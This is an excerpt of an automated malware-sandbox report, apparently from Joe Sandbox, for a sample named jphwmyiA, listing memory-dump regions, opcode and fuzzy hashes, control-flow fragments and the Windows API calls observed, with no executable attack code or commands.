                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0b8b833ff89d374496c1c9b858bde9789d0d0c96480c30f37dba23d8106f1866
                                                                                                                                            • Instruction ID: 71b9e01ba5fcd9b3bbceddb2b9bc520ded352208e398484ab9265d5193adf02a
                                                                                                                                            • Opcode Fuzzy Hash: 0b8b833ff89d374496c1c9b858bde9789d0d0c96480c30f37dba23d8106f1866
                                                                                                                                            • Instruction Fuzzy Hash: 1281B574E41218DFDB14DFA5D990A9EBBF2BF88300F208529D805AB369DB356945CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d7bb0f1b4a1b8ef60e738e7ded4d733f399b74ade7c372ca2ce6b5b7f5d81eb6
                                                                                                                                            • Instruction ID: cc067b91decde4f5fd384d1dfa65e119cc252df5da9ae496ff5641a38e992ab7
                                                                                                                                            • Opcode Fuzzy Hash: d7bb0f1b4a1b8ef60e738e7ded4d733f399b74ade7c372ca2ce6b5b7f5d81eb6
                                                                                                                                            • Instruction Fuzzy Hash: AA61E674E012589FDB08DFA9E950ADDBBF2AF88310F14C525E818BB365DA30A941CF14
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fc7e4e8905e45502f7b2d6cacda61c8750780b8c58244d45fee0a4abe80eaca6
                                                                                                                                            • Instruction ID: 28307c3490c5f85fa27340adf3e1b74e4e4245d92494863eb02177b435fe946b
                                                                                                                                            • Opcode Fuzzy Hash: fc7e4e8905e45502f7b2d6cacda61c8750780b8c58244d45fee0a4abe80eaca6
                                                                                                                                            • Instruction Fuzzy Hash: 8E514871D106188BDB48CFA6D885A9DFBB2FF99304F10C069C818AB255EF746A52CF41
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a286a7e721521966d9f89c49a0646b8db0e5ffc0651528dfa99b0c08bfe24476
                                                                                                                                            • Instruction ID: e83da0f2d6c987d0222c4cd74a7f1efe327b2fe2a22b77fd710cdc1a21143a1d
                                                                                                                                            • Opcode Fuzzy Hash: a286a7e721521966d9f89c49a0646b8db0e5ffc0651528dfa99b0c08bfe24476
                                                                                                                                            • Instruction Fuzzy Hash: 56510374E012089BDB08CFAAD945ADDBBF2BF99304F209179C418BB255EB35AD46CF40
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74fcda423fa9d9200c44e6a0321ae469add940fb9d75638b1617b24023c4710e
                                                                                                                                            • Instruction ID: 112b95c7ba531fa76fb409875608f506d7ff3a01bacd49be2d9bfd4e5fbeed48
                                                                                                                                            • Opcode Fuzzy Hash: 74fcda423fa9d9200c44e6a0321ae469add940fb9d75638b1617b24023c4710e
                                                                                                                                            • Instruction Fuzzy Hash: BE41C3B1D006088BEB18DFAAD8947DEBBF2BF88304F24C069C418BB255DB755A46CF54
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cb83d51a4e7b58ddef7782da97b4638a08b05cc0aaf41fe3115729f4e72f0e31
                                                                                                                                            • Instruction ID: edbb8ff639756ed91b5aa0bb0e53fe0a4faf5125fc4498a2e3d6301da132f4ed
                                                                                                                                            • Opcode Fuzzy Hash: cb83d51a4e7b58ddef7782da97b4638a08b05cc0aaf41fe3115729f4e72f0e31
                                                                                                                                            • Instruction Fuzzy Hash: 1041B5B1D006088BEB18DFAAD8447DEBBF2BF89304F24D06AD418BB254EB355945CF55
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cc19d3b40ce80e82ad5409441efb0ed69ef0ef36a6968c6f8f02bf2d380c95f8
                                                                                                                                            • Instruction ID: 6d8f229c78ffb4f3eb87f57c092c771d42b84fb1506db39effa481f4dd46223c
                                                                                                                                            • Opcode Fuzzy Hash: cc19d3b40ce80e82ad5409441efb0ed69ef0ef36a6968c6f8f02bf2d380c95f8
                                                                                                                                            • Instruction Fuzzy Hash: 1F41D5B0E056488BDB18CFAAD8546DEFBF2BF89304F24D43AC418AB255DB356946CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b91310a7322ed6911e2592fae30ce285eec608ed06c6451c8bee7815c98f3d18
                                                                                                                                            • Instruction ID: a0a2ebe23a63dac9d341d08ad755ee05ad3eeb3233df72ea55189f44498e85c5
                                                                                                                                            • Opcode Fuzzy Hash: b91310a7322ed6911e2592fae30ce285eec608ed06c6451c8bee7815c98f3d18
                                                                                                                                            • Instruction Fuzzy Hash: D141C271E01218CBDB18DFAAD854B9EBBF2BF89304F24D06AD818AB254DB345946CF40
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e2b863c28de898ab011ca3e97634059187446e1858dd0148c9d054f7bcc8b051
                                                                                                                                            • Instruction ID: 0f60cfe63da3dd11ad91260c3a76df055d5acb737d7c8659e53fabe5fecefd89
                                                                                                                                            • Opcode Fuzzy Hash: e2b863c28de898ab011ca3e97634059187446e1858dd0148c9d054f7bcc8b051
                                                                                                                                            • Instruction Fuzzy Hash: 9141F371E006188BDB18DFAAD8946DEBBF2BF89304F10D069C418BB259EB346946CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 63712c08e70817159d23497c90fe1a437ded1f3bb487d75019f2348f103deb85
                                                                                                                                            • Instruction ID: 549bb1bd2e348a7b0e8ad0bfc44db9c38803af20322735f75b20285e2d686269
                                                                                                                                            • Opcode Fuzzy Hash: 63712c08e70817159d23497c90fe1a437ded1f3bb487d75019f2348f103deb85
                                                                                                                                            • Instruction Fuzzy Hash: A431D675E016188FDB08DFA6D84069DBBF2BF89300F24D469D418BB258DB346906CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9ddd19107cb5cd09d3e9dc1121ac3e65a6c2e35c0733521406ddff7f0d5bfe9b
                                                                                                                                            • Instruction ID: 73b07d67d05418f98fb14dbf69520bd73c5bd5fdc600630581a02a748a7bb1bc
                                                                                                                                            • Opcode Fuzzy Hash: 9ddd19107cb5cd09d3e9dc1121ac3e65a6c2e35c0733521406ddff7f0d5bfe9b
                                                                                                                                            • Instruction Fuzzy Hash: DA31C974E052488FDB14DFAAD8506DEFBF2AF89300F20D02AD518BB254DB356906CF51

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 816 4018f0-4018fa 817 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 816->817 818 4018fc-401900 816->818 821 401940-401949 GetLastError 817->821 822 401996-40199a 817->822 823 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 821->823 824 40198d-40198f 821->824 823->824 824->822 825 401991 call 401030 824->825 825->822
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                            • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3322701435-0

                                                                                                                                            Control-flow Graph (first basic block 2525dd81-2525de1f)
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE0E
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 2525DE4B
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE88
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 2525DEE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0

                                                                                                                                            Control-flow Graph (first basic block 2525dd90-2525de1f)
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE0E
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 2525DE4B
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE88
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 2525DEE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0

                                                                                                                                            Control-flow Graph (first basic block 40af66-40af6e)
                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                              • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR]q$LR]q
                                                                                                                                            • API String ID: 0-3917262905
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (&]q$(aq
                                                                                                                                            • API String ID: 0-1602648543
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2525B401
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2525B401
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2525E0A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2525E0A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 2525F351
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                            APIs
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 20E5EF04
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3758183660.0000000020E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 20E50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_20e50000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                            APIs
                                                                                                                                            • SetTimer.USER32(00000000,?,?,00000000), ref: 2525F5CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2870079774-0
                                                                                                                                            APIs
                                                                                                                                            • SetTimer.USER32(00000000,?,?,00000000), ref: 2525F5CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2870079774-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(?), ref: 2525A672
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(?), ref: 2525A672
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            APIs
                                                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 25B9D0B3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3767535563.0000000025B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 25B90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25b90000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 25B9D0B3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3767535563.0000000025B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 25B90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25b90000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            APIs
                                                                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 25037F4E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                            • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocString_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 959018026-0
                                                                                                                                            APIs
                                                                                                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: nKuq
                                                                                                                                            • API String ID: 0-4080595220
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3758183660.0000000020E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 20E50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_20e50000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9a1b83c46048df3f38055dd365a37414ce4f95c5265cec9a810bd89f1b6724d1
                                                                                                                                            • Instruction ID: 96b1db034ff939820898c8be5d8db65e597d50df1ce2831b6838a3f23e0f00dc
                                                                                                                                            • Opcode Fuzzy Hash: 9a1b83c46048df3f38055dd365a37414ce4f95c5265cec9a810bd89f1b6724d1
